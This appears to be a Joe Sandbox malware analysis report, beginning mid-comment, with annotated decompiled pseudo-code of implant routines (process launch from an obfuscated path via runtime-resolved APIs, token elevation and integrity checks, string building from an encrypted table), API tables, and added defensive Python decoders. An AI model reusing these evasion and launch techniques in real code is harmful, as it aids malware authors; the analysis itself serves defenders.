                             			// here, the full names are not in the report), runs the routine returned in
                             			// _v12 and, if that returns 0 and bit 0 of the flag DWORD at 0x4a1a300 is
                             			// set, starts a new process from an expanded "%sys..." path. The
                             			// process-creation export is resolved by name at run time from the module
                             			// whose name starts "KERN" (4E52454B); the name is not visible here. Its 11
                             			// arguments, STARTUPINFOA.cb = 0x44 and the flag 0x4000000
                             			// (CREATE_DEFAULT_ERROR_MODE) match the CreateProcessAsUserA signature, which
                             			// is the reading behind the "launch a process as a different user" signature;
                             			// treat that name as inferred. Square-bracket comments give the reported
                             			// address of each statement.
                             			E04A1402A(void* __eax, void* __ecx) {
                             				long _v8;        // result: 0 on success, otherwise a Win32 error code
                             				char _v12;       // routine pointer filled in by E04A144DE
                             				void* _v16;      // context object returned by E04A144DE
                             				void* _v28;      // PROCESS_INFORMATION.hThread (_v32 + 4)
                             				long _v32;       // PROCESS_INFORMATION (hProcess, hThread, pid, tid)
                             				void _v104;      // STARTUPINFOA fields after cb
                             				char _v108;      // STARTUPINFOA.cb
                             				long _t36;
                             				intOrPtr _t40;
                             				intOrPtr _t47;
                             				intOrPtr _t50;
                             				void* _t58;      // BOOL returned by the process-creation call
                             				void* _t68;      // expanded path string on the heap
                             				intOrPtr* _t70;
                             				intOrPtr* _t71;  // resolved process-creation export
                             
                             				_t1 = __eax + 0x14; // 0x74183966  [0x04a14032]
                             				_t69 =  *_t1;  // [0x04a14032]
                             				_t36 = E04A144DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed  [0x04a14041]
                             				_v8 = _t36;  // [0x04a14048]
                             				if(_t36 != 0) {  // [0x04a1404d] resolution failed: return its error code
                             					L12:  // [0x04a1415a]
                             					return _v8;  // [0x04a14161]
                             				}  // [0x04a14161]
                             				E04A17A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);  // [0x04a1405c]
                             				_t40 = _v12(_v12);  // [0x04a14064] run the resolved routine
                             				_v8 = _t40;  // [0x04a14067]
                             				if(_t40 == 0 && ( *0x4a1a300 & 0x00000001) != 0) {  // [0x04a1406c] config bit 0: also spawn a process
                             					_v32 = 0;  // [0x04a14081] zero PROCESS_INFORMATION (three more stosd)
                             					asm("stosd");  // [0x04a14087]
                             					asm("stosd");  // [0x04a14088]
                             					asm("stosd");  // [0x04a1408b]
                             					_v108 = 0;  // [0x04a14091] zero STARTUPINFOA
                             					memset( &_v104, 0, 0x40);  // [0x04a14094]
                             					_t47 =  *0x4a1a348; // 0xb1d5a8  [0x04a14099] base of the obfuscated string table
                             					_t18 = _t47 + 0x4a1b3f3; // 0x73797325 ("%sys" little-endian)  [0x04a140a1]
                             					_t68 = E04A17326(_t18);  // [0x04a140ad] ExpandEnvironmentStringsA into a heap buffer
                             					if(_t68 == 0) {  // [0x04a140b1]
                             						_v8 = 8;  // [0x04a14141] ERROR_NOT_ENOUGH_MEMORY
                             					} else {  // [0x04a140b7]
                             						_t50 =  *0x4a1a348; // 0xb1d5a8  [0x04a140b7]
                             						_t19 = _t50 + 0x4a1b73f; // 0x5538ce7 (export name)  [0x04a140bc]
                             						_t20 = _t50 + 0x4a1b0af; // 0x4e52454b ("KERN" little-endian)  [0x04a140c3]
                             						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);  // [0x04a140d7]
                             						if(_t71 == 0) {  // [0x04a140db]
                             							_v8 = 0x7f;  // [0x04a1412a] ERROR_PROC_NOT_FOUND
                             						} else {  // [0x04a140dd]
                             							_v108 = 0x44;  // [0x04a140de] sizeof(STARTUPINFOA)
                             							E04A123AA();  // [0x04a140e5] resolves a "Wow6..." export (36776F57 in the APIs list); paired with the call below
                             							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed  [0x04a140fe]
                             							_push(1);  // [0x04a14100]
                             							E04A123AA();  // [0x04a14104] same wrapper, argument 1 (revert); consistent with Wow64 file-system redirection being disabled around the call (inferred)
                             							if(_t58 == 0) {  // [0x04a1410b]
                             								_v8 = GetLastError();  // [0x04a14125]
                             							} else {  // [0x04a1410d]
                             								FindCloseChangeNotification(_v28); // executed  [0x04a14116] closes hThread; this export and CloseHandle resolve to the same kernel32 code, hence the name
                             								CloseHandle(_v32);  // [0x04a1411b] closes hProcess
                             							}  // [0x04a1411b]
                             						}  // [0x04a1410b]
                             						HeapFree( *0x4a1a2d8, 0, _t68);  // [0x04a14139]
                             					}  // [0x04a14139]
                             				}  // [0x04a140b1]
                             				_t70 = _v16;  // [0x04a14148]
                             				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));  // [0x04a14151] tear down the context through its own routine pointers
                             				E04A16C2C(_t70);  // [0x04a14155] RtlFreeHeap wrapper
                             				goto L12;  // [0x00000000]
                             			}

                            APIs
                              • Part of subcall function 04A144DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A14046,?,?,?,?,00000000,00000000), ref: 04A14503
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A14525
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A1453B
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A14551
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A14567
                              • Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A1457D
                            • memset.NTDLL ref: 04A14094
                              • Part of subcall function 04A17326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04A140AD,73797325), ref: 04A17337
                              • Part of subcall function 04A17326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04A17351
                            • GetModuleHandleA.KERNEL32(4E52454B,05538CE7,73797325), ref: 04A140CA
                            • GetProcAddress.KERNEL32(00000000), ref: 04A140D1
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A14139
                              • Part of subcall function 04A123AA: GetProcAddress.KERNEL32(36776F57,04A17989), ref: 04A123C5
                            • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 04A14116
                            • CloseHandle.KERNEL32(?), ref: 04A1411B
                            • GetLastError.KERNEL32(00000001), ref: 04A1411F
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                            • String ID:
                            • API String ID: 186216982-0
                            • Opcode ID: 6e69bc7c7c4c00a7eda8cacf254eef46a411656d93c4720f757c975e36875e6f
                            • Instruction ID: efcb12f59ea0ce528bad049a8117e38d2459386bf5f5510220ba988018151dac
                            • Opcode Fuzzy Hash: 6e69bc7c7c4c00a7eda8cacf254eef46a411656d93c4720f757c975e36875e6f
                            • Instruction Fuzzy Hash: F63160B6901218AFEB10AFA4DD88EDEBBBCEB18354F144465EA05E7130D734AE45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%
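The APIs tables in this report print a string-pointer argument as the first four bytes at the pointer, packed into one little-endian hex DWORD. That is why subcall 04A144DE above appears to pass numbers such as 7243775A to GetProcAddress: read as bytes they are the name prefixes "ZwCr", "ZwMa", "ZwUn", "RtlN" and "ZwCl", and the same convention turns 4E52454B into "KERN", 73797325 into "%sys" and, in E04A11D33 further down, 253D7325 into "%s=%". The helper below is an added example for working through such listings; it is not part of the report or of the sample. It parses the report's "Name.MODULE(args), ref: ADDR" lines and reports every argument that decodes to four printable ASCII bytes or to two UTF-16LE characters. The SAMPLE_LINES list is copied from the tables above and is the only input it assumes.

```python
"""Decode the DWORD arguments Joe Sandbox prints for string-pointer parameters.

Added example, not part of the report or the sample. A string-pointer argument is
shown as the first four bytes at the pointer, little-endian, so 7243775A is the
name prefix "ZwCr". parse_call() splits one APIs-table line; decoded_strings()
returns every argument that spells printable text.
"""
import re
import struct

# "Api.MODULE(arg,arg,...), ref: 04A14525" or the no-argument form
# "memset.NTDLL ref: 04A14094". The greedy args group ends at the last ')',
# so annotations like "00000014(TokenIntegrityLevel)" stay inside the list.
CALL_RE = re.compile(
    r'^(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9]+)'
    r'(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$')
HEX8_RE = re.compile(r'^([0-9A-Fa-f]{8})')

# Constructed input: lines copied from the APIs tables of this report.
SAMPLE_LINES = [
    "• Part of subcall function 04A144DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A14046,?,?,?,?,00000000,00000000), ref: 04A14503",
    "• Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A14525",
    "• Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A1453B",
    "• Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A14551",
    "• Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A14567",
    "• Part of subcall function 04A144DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A1457D",
    "• memset.NTDLL ref: 04A14094",
    "• GetModuleHandleA.KERNEL32(4E52454B,05538CE7,73797325), ref: 04A140CA",
    "• Part of subcall function 04A123AA: GetProcAddress.KERNEL32(36776F57,04A17989), ref: 04A123C5",
    "• GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04A16C93",
    "• SysAllocString.OLEAUT32(0070006F), ref: 04A13F75",
]


def _printable(b):
    return 0x20 <= b < 0x7F


def decode_dword(hex8):
    """Return ('ascii', text) or ('utf16', text) when the DWORD spells text, else None."""
    raw = struct.pack('<I', int(hex8, 16))
    if all(_printable(b) for b in raw):
        return 'ascii', raw.decode('ascii')
    # Two UTF-16LE code units: printable low bytes, zero high bytes.
    if raw[1] == 0 and raw[3] == 0 and _printable(raw[0]) and _printable(raw[2]):
        return 'utf16', chr(raw[0]) + chr(raw[2])
    return None


def parse_call(line):
    """Split one APIs-table line into api, module, ref and the raw argument list."""
    text = line.strip().lstrip('•').strip()
    if text.startswith('Part of subcall function'):
        text = text.split(':', 1)[1].strip()      # drop the subcall prefix
    m = CALL_RE.match(text)
    if not m:
        return None
    args = [a.strip() for a in m.group('args').split(',')] if m.group('args') else []
    return {'api': m.group('api'), 'module': m.group('mod'),
            'ref': m.group('ref').upper(), 'args': args}


def decoded_strings(lines):
    """Return (api, ref, arg_index, hex, kind, text) for every argument that decodes."""
    out = []
    for line in lines:
        call = parse_call(line)
        if call is None:
            continue
        for i, arg in enumerate(call['args']):
            m = HEX8_RE.match(arg)
            if not m:
                continue          # '?', '=' and negative values carry no string
            hit = decode_dword(m.group(1))
            if hit:
                out.append((call['api'], call['ref'], i, m.group(1).upper(), hit[0], hit[1]))
    return out


if __name__ == '__main__':
    for api, ref, i, hx, kind, text in decoded_strings(SAMPLE_LINES):
        print(f'{ref} {api:<18} arg{i} {hx} -> {text!r} ({kind})')
```

Only four bytes are visible per argument, so the output is a prefix, not a name: "ZwCr" is consistent with ZwCreateSection and "Wow6" with the Wow64 file-system redirection pair, but confirming either needs the string table in the memory dump, not this listing. Values that happen to be printable (addresses, flags) can produce false hits; the four-printable-bytes test rejects every flag and address in the sample lines, but check any unexpected hit against the call's parameter type.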

                            APIs
                              • Part of subcall function 04F673EB: memset.NTDLL ref: 04F673F5
                            • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?), ref: 04F61381
                            • SetEvent.KERNEL32(00000000,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F6138E
                            • Sleep.KERNEL32(00000BB8,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F61399
                            • ResetEvent.KERNEL32(00000000,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F613A0
                            • CloseHandle.KERNEL32(00000000,?,04F6E2A4,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F613A7
                            • GetShellWindow.USER32 ref: 04F613B2
                            • GetWindowThreadProcessId.USER32(00000000), ref: 04F613B9
                              • Part of subcall function 04F7B1DC: RegCloseKey.ADVAPI32(04F6E2A4), ref: 04F7B25F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                            • String ID:
                            • API String ID: 53838381-0
                            • Opcode ID: 4bb2f24d184eff3874fb32451054e395f8faa7f573262a3131947405fa46b189
                            • Instruction ID: 0c98b4e2bd8ac0a7832f7865ad2952d348bfbfba8faed70847e84989ec61fb4b
                            • Opcode Fuzzy Hash: 4bb2f24d184eff3874fb32451054e395f8faa7f573262a3131947405fa46b189
                            • Instruction Fuzzy Hash: C621B632B00218BFD2206A69BC49E3F77A9EBCA714B14410EF6079F100DB797C02CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                             			// Returns the token's elevation flag and writes its mandatory integrity RID
                             			// to *_a4. The defaults are "elevated" and Medium (0x2000): before Vista
                             			// (OS major version stored at 0x4a1a2fc is 5 or lower) there are no
                             			// integrity levels and the defaults are returned unchanged. The RID is the
                             			// last sub-authority of the S-1-16-<RID> label SID, which is what the
                             			// GetSidSubAuthority(sid, count - 1) expression below reads. Square-bracket
                             			// comments give the reported address of each statement.
                             			E04A16C41(long* _a4) {
                             				long _v8;        // byte count in/out for GetTokenInformation
                             				void* _v12;      // process token handle
                             				void _v16;       // TOKEN_ELEVATION.TokenIsElevated; the return value
                             				long _v20;       // integrity RID, stored to *_a4
                             				int _t33;
                             				void* _t46;      // heap buffer holding TOKEN_MANDATORY_LABEL
                             
                             				_v16 = 1;  // [0x04a16c4e]
                             				_v20 = 0x2000;  // [0x04a16c55] SECURITY_MANDATORY_MEDIUM_RID
                             				if( *0x4a1a2fc > 5) {  // [0x04a16c5c] Vista or later only
                             					_v16 = 0;  // [0x04a16c70]
                             					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {  // [0x04a16c7b] current process; READ_CONTROL | TOKEN_QUERY
                             						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed  [0x04a16c93] 0x14 = TokenElevation
                             						_v8 = 0;  // [0x04a16ca0]
                             						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed  [0x04a16ca3] 0x19 = TokenIntegrityLevel, size query
                             						if(_v8 != 0) {  // [0x04a16ca8]
                             							_t46 = E04A16D63(_v8);  // [0x04a16cb3] RtlAllocateHeap wrapper
                             							if(_t46 != 0) {  // [0x04a16cb7]
                             								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed  [0x04a16cc6]
                             								if(_t33 != 0) {  // [0x04a16cca]
                             									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));  // [0x04a16ce6] *_t46 = Label.Sid; last sub-authority = integrity RID
                             								}  // [0x04a16ce6]
                             								E04A16C2C(_t46);  // [0x04a16cea] RtlFreeHeap wrapper
                             							}  // [0x04a16cea]
                             						}  // [0x04a16cef]
                             						CloseHandle(_v12);  // [0x04a16cf3]
                             					}  // [0x04a16cf9]
                             				}  // [0x04a16cfa]
                             				 *_a4 = _v20;  // [0x04a16d01]
                             				return _v16;  // [0x04a16d07]
                             			}

                            APIs
                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04A16C73
                             • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 04A16C93
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04A16CA3
                            • CloseHandle.KERNEL32(00000000), ref: 04A16CF3
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04A16CC6
                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04A16CCE
                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04A16CDE
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                            • String ID:
                            • API String ID: 1295030180-0
                            • Opcode ID: 1c2f208ba2e40b534bf10f7303ea58f9c20c10831e94192aef7f0c461eaded4f
                            • Instruction ID: f99c79a67eee7f478236022ed585bdec650c6746dc78244c7d16f87c98d9d569
                            • Opcode Fuzzy Hash: 1c2f208ba2e40b534bf10f7303ea58f9c20c10831e94192aef7f0c461eaded4f
                            • Instruction Fuzzy Hash: 80213975900249FFEB11DF94DD84EEEBBB9EB08304F0000A5E910A6160D7759E45DF60
                            Uniqueness

                            Uniqueness Score: -1.00%
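E04A16C41 above decides how much the implant may do from the token alone: class 0x14 (TokenElevation) gives the elevation flag, class 0x19 (TokenIntegrityLevel) gives a TOKEN_MANDATORY_LABEL whose SID is S-1-16-<RID>, and the RID is read as the SID's last sub-authority; on anything older than Vista the routine simply reports "elevated, Medium". The following is an added example, not code from the sample or from the report: a pure-Python SID parser that reproduces that read on raw SID bytes, so the logic can be exercised offline on a dumped buffer or on the constructed SIDs built by build_sid(). The RID names come from the SECURITY_MANDATORY_*_RID constants in winnt.h; classify_token() mirrors the routine's defaults and is the only part that assumes the decompiled control flow rather than documented Windows behaviour.

```python
"""Read the integrity RID from a mandatory-label SID the way E04A16C41 does.

Added example, not code from the sample or the report. parse_sid() decodes the
on-the-wire SID layout (revision, sub-authority count, 6-byte big-endian
identifier authority, little-endian DWORD sub-authorities); integrity_rid()
takes the last sub-authority of an S-1-16 SID, which is the
GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1) expression in the
routine; classify_token() reproduces the routine's return values and defaults.
"""
import struct

SID_REVISION = 1
SECURITY_MANDATORY_LABEL_AUTHORITY = 16      # S-1-16-...
SECURITY_MANDATORY_MEDIUM_RID = 0x2000       # the routine's default RID
INTEGRITY_NAMES = {                          # SECURITY_MANDATORY_*_RID (winnt.h)
    0x0000: 'Untrusted', 0x1000: 'Low', 0x2000: 'Medium', 0x2100: 'Medium Plus',
    0x3000: 'High', 0x4000: 'System', 0x5000: 'Protected Process',
}


def build_sid(identifier_authority, sub_authorities):
    """Serialise a SID (used here to construct test input)."""
    if not 1 <= len(sub_authorities) <= 15:
        raise ValueError('SID sub-authority count must be 1..15')
    return (struct.pack('<BB', SID_REVISION, len(sub_authorities))
            + identifier_authority.to_bytes(6, 'big')
            + b''.join(struct.pack('<I', s) for s in sub_authorities))


def parse_sid(blob):
    """Return (identifier_authority, [sub_authorities]); raise on a malformed SID."""
    if len(blob) < 8 or blob[0] != SID_REVISION:
        raise ValueError('bad SID revision or truncated header')
    count = blob[1]
    if not 1 <= count <= 15 or len(blob) < 8 + 4 * count:
        raise ValueError('bad sub-authority count or truncated SID')
    authority = int.from_bytes(blob[2:8], 'big')
    subs = list(struct.unpack_from('<%dI' % count, blob, 8))
    return authority, subs


def sid_to_string(blob):
    authority, subs = parse_sid(blob)
    return 'S-1-%d-%s' % (authority, '-'.join(str(s) for s in subs))


def last_sub_authority(blob):
    """Value of GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1)."""
    return parse_sid(blob)[1][-1]


def integrity_rid(blob):
    """Integrity RID of a mandatory-label SID; rejects SIDs from other authorities."""
    authority, subs = parse_sid(blob)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY:
        raise ValueError('not an S-1-16 mandatory label SID')
    return subs[-1]


def integrity_name(rid):
    """Name of the highest defined level not above rid (labels may sit between levels)."""
    base = max(r for r in INTEGRITY_NAMES if r <= rid)
    return INTEGRITY_NAMES[base]


def classify_token(os_major, token_is_elevated, label_sid):
    """Mirror E04A16C41: returns (elevated, rid).

    Pre-Vista (major version <= 5) yields the fixed defaults (1, 0x2000).
    Otherwise elevated comes from TokenElevation and the RID from the label
    SID; if the SID is missing or unusable the RID stays at the Medium default,
    as the routine leaves _v20 untouched on any failure.
    """
    if os_major <= 5:
        return 1, SECURITY_MANDATORY_MEDIUM_RID
    rid = SECURITY_MANDATORY_MEDIUM_RID
    if label_sid is not None:
        try:
            rid = integrity_rid(label_sid)
        except ValueError:
            pass
    return int(bool(token_is_elevated)), rid


if __name__ == '__main__':
    sid = build_sid(SECURITY_MANDATORY_LABEL_AUTHORITY, [0x2000])   # constructed Medium label
    print(sid_to_string(sid), integrity_name(integrity_rid(sid)), classify_token(10, 0, sid))
```

When reading the label out of a dumped TOKEN_MANDATORY_LABEL buffer, remember that the structure holds a pointer (Label.Sid) and an attributes DWORD; the SID bytes follow the structure in the same buffer, so take the slice the pointer addresses rather than the first bytes of the buffer. The routine's "elevated by default before Vista" shortcut also means a result of (1, 0x2000) on its own does not prove the process is actually running with an elevated token.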

                            C-Code - Quality: 64%
                             			// Builds a "<name>=<value>" string and normalises it before use. The format
                             			// comes from the obfuscated string table (0x4a1a348 + 0x4a1b624; the APIs
                             			// list shows its first DWORD as 253D7325, "%s=%" read little-endian), _a4 is
                             			// appended with lstrcat, E04A124B3 transforms the result (_a8 selects the
                             			// transform), StrTrimA removes leading and trailing '=' characters and two
                             			// further passes (E04A15A07, which uses _snprintf, then E04A14162) may each
                             			// replace the buffer. The decompiler could not name __imp__; the APIs list
                             			// identifies the two calls as lstrlen and lstrcat. Intermediate buffers go
                             			// through E04A16D63/E04A16C2C (RtlAllocateHeap/RtlFreeHeap) and the caller
                             			// owns the returned string. Square-bracket comments give the reported
                             			// address of each statement.
                             			E04A11D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                             				intOrPtr _v8;    // lstrlen of the formatted prefix
                             				intOrPtr _t9;
                             				intOrPtr _t13;
                             				char* _t19;
                             				char* _t28;      // formatted prefix (heap)
                             				void* _t33;
                             				void* _t34;
                             				char* _t36;      // current result; NULL on failure
                             				void* _t38;
                             				intOrPtr* _t39;  // lstrlen import
                             				char* _t40;      // prefix + value buffer (heap)
                             				char* _t42;
                             				char* _t43;
                             
                             				_t34 = __edx;  // [0x04a11d33]
                             				_push(__ecx);  // [0x04a11d36]
                             				_t9 =  *0x4a1a348; // 0xb1d5a8  [0x04a11d37]
                             				_t1 = _t9 + 0x4a1b624; // 0x253d7325  [0x04a11d3e]
                             				_t36 = 0;  // [0x04a11d45]
                             				_t28 = E04A1624E(__ecx, _t1);  // [0x04a11d4c] sprintf the format into a new heap string
                             				if(_t28 != 0) {  // [0x04a11d50]
                             					_t39 = __imp__;  // [0x04a11d57] lstrlen
                             					_t13 =  *_t39(_t28, _t38);  // [0x04a11d5e]
                             					_v8 = _t13;  // [0x04a11d63]
                             					_t6 =  *_t39(_a4) + 1; // 0x55395b1  [0x04a11d6b] length of _a4 plus the terminator
                             					_t40 = E04A16D63(_v8 + _t6);  // [0x04a11d75] allocate prefix + value + NUL
                             					if(_t40 != 0) {  // [0x04a11d79]
                             						strcpy(_t40, _t28);  // [0x04a11d7d]
                             						_pop(_t33);  // [0x04a11d83]
                             						__imp__(_t40, _a4);  // [0x04a11d88] lstrcat
                             						_t19 = E04A124B3(_t33, _t34, _t40, _a8); // executed  [0x04a11d92] transform into a new heap string
                             						_t36 = _t19;  // [0x04a11d98]
                             						E04A16C2C(_t40);  // [0x04a11d9a]
                             						_t42 = E04A15A07(StrTrimA(_t36, "="), _t36);  // [0x04a11db1] strip '=' from both ends, then the _snprintf pass
                             						if(_t42 != 0) {  // [0x04a11db5]
                             							E04A16C2C(_t36);  // [0x04a11db8]
                             							_t36 = _t42;  // [0x04a11dbd]
                             						}  // [0x04a11dbd]
                             						_t43 = E04A14162(_t36, _t33);  // [0x04a11dc6]
                             						if(_t43 != 0) {  // [0x04a11dca]
                             							E04A16C2C(_t36);  // [0x04a11dcd]
                             							_t36 = _t43;  // [0x04a11dd2]
                             						}  // [0x04a11dd2]
                             					}  // [0x04a11dca]
                             					E04A16C2C(_t28);  // [0x04a11dd5]
                             				}  // [0x04a11dda]
                             				return _t36;  // [0x04a11de0]
                             			}

                            APIs
                              • Part of subcall function 04A1624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A11D4C,253D7325,00000000,00000000,?,746BC740,04A158D7), ref: 04A162B5
                              • Part of subcall function 04A1624E: sprintf.NTDLL ref: 04A162D6
                            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11D5E
                            • lstrlen.KERNEL32(00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11D66
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • strcpy.NTDLL ref: 04A11D7D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 04A11D88
                              • Part of subcall function 04A124B3: lstrlen.KERNEL32(00000000,00000000,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A124C4
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11DA5
                              • Part of subcall function 04A15A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,04A11DB1,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A15A11
                              • Part of subcall function 04A15A07: _snprintf.NTDLL ref: 04A15A6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            • Opcode ID: 64b529a017048d7b0570e095ffd741adb0eb57bfe259460c1a5a3dab9e95235c
                            • Instruction ID: b67413728b2763d02693a3f98f9a0612c70d6394e1f3ade52a584c410a4e1bd2
                            • Opcode Fuzzy Hash: 64b529a017048d7b0570e095ffd741adb0eb57bfe259460c1a5a3dab9e95235c
                            • Instruction Fuzzy Hash: BA11C677901124776B127BB49E84CEF3AADDF996587050415FE00D7120CE79FD02C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04A11F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055389D0,04A13F35,?,?,?,?,?,?,?,?,?,?,?,04A13F35), ref: 04A12047
                              • Part of subcall function 04A15634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04A15671
                              • Part of subcall function 04A15634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04A156A2
                            • SysAllocString.OLEAUT32(00000000), ref: 04A13F61
                            • SysAllocString.OLEAUT32(0070006F), ref: 04A13F75
                            • SysAllocString.OLEAUT32(00000000), ref: 04A13F87
                            • SysFreeString.OLEAUT32(00000000), ref: 04A13FEF
                            • SysFreeString.OLEAUT32(00000000), ref: 04A13FFE
                            • SysFreeString.OLEAUT32(00000000), ref: 04A14009
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
